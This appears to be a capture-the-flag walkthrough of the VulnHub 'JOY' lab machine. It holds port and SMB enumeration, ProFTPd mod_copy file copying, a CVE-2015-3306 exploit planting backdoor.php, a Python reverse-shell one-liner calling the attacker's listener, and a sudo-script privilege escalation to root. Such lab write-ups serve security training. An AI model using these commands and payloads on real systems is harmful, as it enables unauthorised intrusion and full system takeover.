Digitalworld.local: JOY – Pentesting Fun Stuff

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

nmap scan for open ports + services

```

PORT STATE SERVICE VERSION

21/tcp open ftp

| fingerprint-strings:

| GenericLines:

| 220 The Good Tech Inc. FTP Server

| Invalid command: try being more creative

|_ Invalid command: try being more creative

22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)

25/tcp open smtp Postfix smtpd

|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,

80/tcp open http Apache httpd 2.4.25 ((Debian))

| http-ls: Volume /

| SIZE TIME FILENAME

| - 2016-07-19 20:03 ossec/

| http-methods:

|_ Supported Methods: POST OPTIONS HEAD GET

|_http-server-header: Apache/2.4.25 (Debian)

|_http-title: Index of /

110/tcp open pop3 Dovecot pop3d

|_pop3-capabilities: RESP-CODES TOP SASL AUTH-RESP-CODE PIPELINING STLS UIDL CAPA

|_ssl-date: TLS randomness does not represent time

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

143/tcp open imap Dovecot imapd

|_imap-capabilities: LITERAL+ capabilities more LOGIN-REFERRALS have LOGINDISABLEDA0001 post-login STARTTLS IDLE Pre-login SASL-IR IMAP4rev1 listed OK ENABLE ID

|_ssl-date: TLS randomness does not represent time

445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)

465/tcp open smtp Postfix smtpd

|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,

587/tcp open smtp Postfix smtpd

|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,

993/tcp open ssl/imaps?

| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG

| Issuer: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2019-01-27T17:23:23

| Not valid after: 2032-10-05T17:23:23

| MD5: c8f9 a1cb ac3b baa1 f158 2916 d7bd d3b0

|_SHA-1: 5df6 1fce d31e e8c4 9bd9 b5b7 27fa 4f28 cfb9 34c6

|_ssl-date: TLS randomness does not represent time

995/tcp open ssl/pop3s?

| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG

| Issuer: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2019-01-27T17:23:23

| Not valid after: 2032-10-05T17:23:23

| MD5: c8f9 a1cb ac3b baa1 f158 2916 d7bd d3b0

|_SHA-1: 5df6 1fce d31e e8c4 9bd9 b5b7 27fa 4f28 cfb9 34c6

|_ssl-date: TLS randomness does not represent time

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port21-TCP:V=7.91%I=7%D=5/1%Time=608D1EE9%P=x86_64-pc-linux-gnu%r(Gener

SF:icLines,7F,"220\x20The\x20Good\x20Tech\x20Inc\.\x20FTP\x20Server\r\n500

SF:\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n500\x20I

SF:nvalid\x20command:\x20try\x20being\x20more\x20creative\r\n");

MAC Address: 00:0C:29:C0:74:CD (VMware)

Service Info: Hosts: JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:

|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s

| nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

| Names:

| JOY<00> Flags: <unique><active>

| JOY<03> Flags: <unique><active>

| JOY<20> Flags: <unique><active>

| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>

| WORKGROUP<00> Flags: <group><active>

| WORKGROUP<1d> Flags: <unique><active>

|_ WORKGROUP<1e> Flags: <group><active>

| smb-os-discovery:

| OS: Windows 6.1 (Samba 4.5.12-Debian)

| Computer name: joy

| NetBIOS computer name: JOY\x00

| Domain name: \x00

| FQDN: joy

|_ System time: 2021-05-01T17:27:22+08:00

| smb-security-mode:

| account_used: guest

| authentication_level: user

| challenge_response: supported

|_ message_signing: disabled (dangerous, but default)

| smb2-security-mode:

| 2.02:

|_ Message signing enabled but not required

| smb2-time:

| date: 2021-05-01T09:27:22

|_ start_date: N/A

```

SMB

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy]

└─$ enum4linux 192.168.58.137

...[SNIP]...

S-1-22-1-1000 Unix User\patrick (Local User)

S-1-22-1-1001 Unix User\ftp (Local User)

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy]

└─$ smbmap -R -H 192.168.58.137

[+] Guest session IP: 192.168.58.137:445 Name: unknown

Disk Permissions Comment

---- ----------- -------

print$ NO ACCESS Printer Drivers

IPC$ NO ACCESS IPC Service (Samba 4.5.12-Debian)

```

FTP

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy]

└─$ ftp

ftp> open 192.168.58.137

Connected to 192.168.58.137.

220 The Good Tech Inc. FTP Server

Name (192.168.58.137:n0w4n): anonymous

331 Anonymous login ok, send your complete email address as your password

Password:

230 Anonymous access granted, restrictions apply

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

200 PORT command successful

150 Opening ASCII mode data connection for file list

drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download

drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload

226 Transfer complete

ftp> cd upload

250 CWD command successful

ftp> ls

200 PORT command successful

150 Opening ASCII mode data connection for file list

-rwxrwxr-x 1 ftp ftp 2110 May 1 09:36 directory

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo

-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado

-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo

-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano

-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento

-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho

-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko

-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto

-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno

-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto

-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo

-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo

-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder

```

Downloading all files

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy]

└─$ wget -r ftp://anonymous:pass@192.168.58.137/upload/

```

Result:

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137/upload]

└─$ ls -lah

total 60K

drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 11:37 .

drwxr-xr-x 3 n0w4n n0w4n 4.0K May 1 11:37 ..

-rw-r--r-- 1 n0w4n n0w4n 2.1K May 1 09:36 directory

-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_armadillo

-rw-r--r-- 1 n0w4n n0w4n 25 Jan 6 2019 project_bravado

-rw-r--r-- 1 n0w4n n0w4n 88 Jan 6 2019 project_desperado

-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_emilio

-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_flamingo

-rw-r--r-- 1 n0w4n n0w4n 7 Jan 6 2019 project_indigo

-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_komodo

-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_luyano

-rw-r--r-- 1 n0w4n n0w4n 8 Jan 6 2019 project_malindo

-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_okacho

-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_polento

-rw-r--r-- 1 n0w4n n0w4n 20 Jan 6 2019 project_ronaldinho

-rw-r--r-- 1 n0w4n n0w4n 55 Jan 6 2019 project_sicko

-rw-r--r-- 1 n0w4n n0w4n 57 Jan 6 2019 project_toto

-rw-r--r-- 1 n0w4n n0w4n 5 Jan 6 2019 project_uno

-rw-r--r-- 1 n0w4n n0w4n 9 Jan 6 2019 project_vivino

-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_woranto

-rw-r--r-- 1 n0w4n n0w4n 20 Jan 6 2019 project_yolo

-rw-r--r-- 1 n0w4n n0w4n 180 Jan 6 2019 project_zoo

-rw-r--r-- 1 n0w4n n0w4n 24 Jan 6 2019 reminder

```

Reading all the files

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137/upload]

└─$ for i in $(ls); do echo -e "\nFiles ${i}:" && cat ${i}; done

Files directory:

Patrick's Directory

total 112

drwxr-xr-x 18 patrick patrick 4096 May 1 17:35 .

drwxr-xr-x 4 root root 4096 Jan 6 2019 ..

-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history

-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout

-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc

drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache

drwx------ 10 patrick patrick 4096 Dec 26 2018 .config

-rw-r--r-- 1 patrick patrick 0 May 1 17:35 daqXrKzBXEAioPed3hhUH77s3i1JBNsx.txt

drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop

drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents

drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads

drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg

-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha

-rw-r--r-- 1 patrick patrick 0 May 1 17:30 hXtY5duoaey2PEbG67z04d4ryycBKBfw.txt

-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority

-rw-r--r-- 1 patrick patrick 24 May 1 17:30 IUdSCvOu4GrXPvG16AifVYjMrO2JFRRgzqKdM56ojxsTsiaWXVO6lTNeKc1tQbE0.txt

drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local

drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla

drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music

drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano

drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures

-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile

drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public

-rw-r--r-- 1 patrick patrick 24 May 1 17:35 S1LuMxniGge5pjszHuwwbrRN2ToI6jOIlRL5uk3iXFgrMd8FA9iDVFH65gkXXOCV.txt

d--------- 2 root root 4096 Jan 9 2019 script

drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh

-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun

drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates

-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt

-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control

drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos

You should know where the directory can be accessed.

Information of this Machine!

Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

Files project_armadillo:

Files project_bravado:

This is a brave project!

Files project_desperado:

What happens when you have no idea what you are doing? Bang your head against the wall.

Files project_emilio:

Files project_flamingo:

Files project_indigo:

colour

Files project_komodo:

Files project_luyano:

Files project_malindo:

airline

Files project_okacho:

Files project_polento:

Files project_ronaldinho:

skilled footballer!

Files project_sicko:

Perhaps the head of development is secretly a sicko...

Files project_toto:

either a dog name, or the name of a lottery in singapore

Files project_uno:

ONE!

Files project_vivino:

wine app

Files project_woranto:

Files project_yolo:

you only live once!

Files project_zoo:

dog

cat

ant

bird

fish

hare

snake

mouse

eagle

rabbit

jaguar

python

penguin

peacock

phoenix

kangaroo

parakeet

mosquito

mousedeer

woodlouse

cockroach

kingfisher

rhinoceros

pondskater

Files reminder:

Lock down this machine!

```

The file version_control seems interesting.
From the SMB enumeration we know there is a user ftp.
So copying this file from the home folder of patrick to the home folder of ftp should work.

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137]

└─$ nc 192.168.58.137 21

220 The Good Tech Inc. FTP Server

site cpfr /home/patrick/version_control

350 File or directory exists, ready for destination name

site cpto /home/ftp/upload/version_control

250 Copy successful

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137]

└─$ ftp

ftp> open 192.168.58.137

Connected to 192.168.58.137.

220 The Good Tech Inc. FTP Server

Name (192.168.58.137:n0w4n): anonymous

331 Anonymous login ok, send your complete email address as your password

Password:

230 Anonymous access granted, restrictions apply

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> cd upload

250 CWD command successful

ftp> ls

200 PORT command successful

150 Opening ASCII mode data connection for file list

-rwxrwxr-x 1 ftp ftp 3524 May 1 10:12 directory

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo

-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado

-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo

-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano

-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento

-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho

-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko

-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto

-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno

-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino

-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto

-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo

-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo

-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder

-rw-r--r-- 1 0 0 407 May 1 10:09 version_control

226 Transfer complete

ftp> get version_control

local: version_control remote: version_control

200 PORT command successful

150 Opening BINARY mode data connection for version_control (407 bytes)

226 Transfer complete

407 bytes received in 0.00 secs (5.2452 MB/s)

ftp> bye

221 Goodbye.

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137]

└─$ cat version_control

Version Control of External-Facing Services:

Apache: 2.4.25

Dropbear SSH: 0.34

ProFTPd: 1.3.5

Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.

1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.

2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.

```

There are several known exploits to be found on the internet.
This one I’m using: https://github.com/t0kx/exploit-CVE-2015-3306

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy]

└─$ ./exploit.py --host 192.168.58.137 --port 21 --path /var/www/tryingharderisjoy

[+] CVE-2015-3306 exploit by t0kx

[+] Exploiting 192.168.58.137:21

[+] Target exploited, acessing shell at http://192.168.58.137/backdoor.php

[+] Running whoami: www-data

[+] Done

```

Inside the python script is the parameter to use:

```

data = requests.get("http://" + self.__host + "/backdoor.php?cmd=whoami")

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy]

└─$ curl -s http://192.168.58.137/backdoor.php?cmd=id

proftpd: 192.168.58.128:43890: SITE cpto /tmp/.uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)

```

Getting a revser shell with this backdoor

Payload:

```

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.128",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

```

Result:

```

┌──(n0w4n㉿cyberlab)-[~/ctf/joy]

└─$ sudo nc -lvp 9999

[sudo] password for n0w4n:

listening on [any] 9999 ...

192.168.58.137: inverse host lookup failed: Host name lookup failure

connect to [192.168.58.128] from (UNKNOWN) [192.168.58.137] 47188

/bin/sh: 0: can't access tty; job control turned off

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)

```

Time for the recon phase

```

www-data@JOY:/var/www/tryingharderisjoy$ cd ossec

cd ossec

www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -lah

ls -lah

total 116K

drwxr-xr-x 8 www-data www-data 4.0K Jan 6 2019 .

drwxr-xr-x 3 www-data www-data 4.0K May 1 18:30 ..

-rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags

-rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess

-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd

-rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB

-rw-r--r-- 1 www-data www-data 35K Jul 19 2016 LICENSE

-rw-r--r-- 1 www-data www-data 2.1K Jul 19 2016 README

-rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search

drwxr-xr-x 3 www-data www-data 4.0K Jul 19 2016 css

-rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt

drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 img

-rwxr-xr-x 1 www-data www-data 5.1K Jul 19 2016 index.php

drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 js

drwxr-xr-x 3 www-data www-data 4.0K Dec 28 2018 lib

-rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php

-rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy

-rwxr-xr-x 1 www-data www-data 2.5K Jul 19 2016 setup.sh

drwxr-xr-x 2 www-data www-data 4.0K Dec 28 2018 site

drwxrwxrwx 2 www-data www-data 4.0K Dec 28 2018 tmp

www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy

cat patricksecretsofjoy

credentials for JOY:

patrick:apollo098765

root:howtheheckdoiknowwhattherootpasswordis

1 2	how would these hack3rs ever find such a page? ```

```

www-data@JOY:/var/www/tryingharderisjoy/ossec$ su root

su root

Password: howtheheckdoiknowwhattherootpasswordis

su: Authentication failure

www-data@JOY:/var/www/tryingharderisjoy/ossec$ su patrick

su patrick

Password: apollo098765

patrick@JOY:/var/www/tryingharderisjoy/ossec$ id

uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)

```

patrick@JOY:/var/www/tryingharderisjoy/ossec$ sudo -l

sudo -l

Matching Defaults entries for patrick on JOY:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on JOY:

(ALL) NOPASSWD: /home/patrick/script/test

```

First get access to the folder

```

patrick@JOY:~$ sudo /home/patrick/script/test

sudo /home/patrick/script/test

I am practising how to do simple bash scripting!

What file would you like to change permissions within this directory?

../script/

What permissions would you like to set the file to?

777

Currently changing file permissions, please wait.

Tidying up...

Done!

```

Then change the content of the file test and run it with the sudo command

```

patrick@JOY:~/script$ echo '#!/bin/bash' > test

echo '#!/bin/bash' > test

patrick@JOY:~/script$ echo '/bin/bash' >> test

echo '/bin/bash' >> test

patrick@JOY:~/script$ sudo /home/patrick/script/test

sudo /home/patrick/script/test

root@JOY:/home/patrick/script# id

uid=0(root) gid=0(root) groups=0(root)

```

Final part

```

root@JOY:/home/patrick/script# cat /root/proof.txt

cat /root/proof.txt

Never grant sudo permissions on scripts that perform system functions!

```

Tags: ctf ftp sudo

Leave a Reply Cancel reply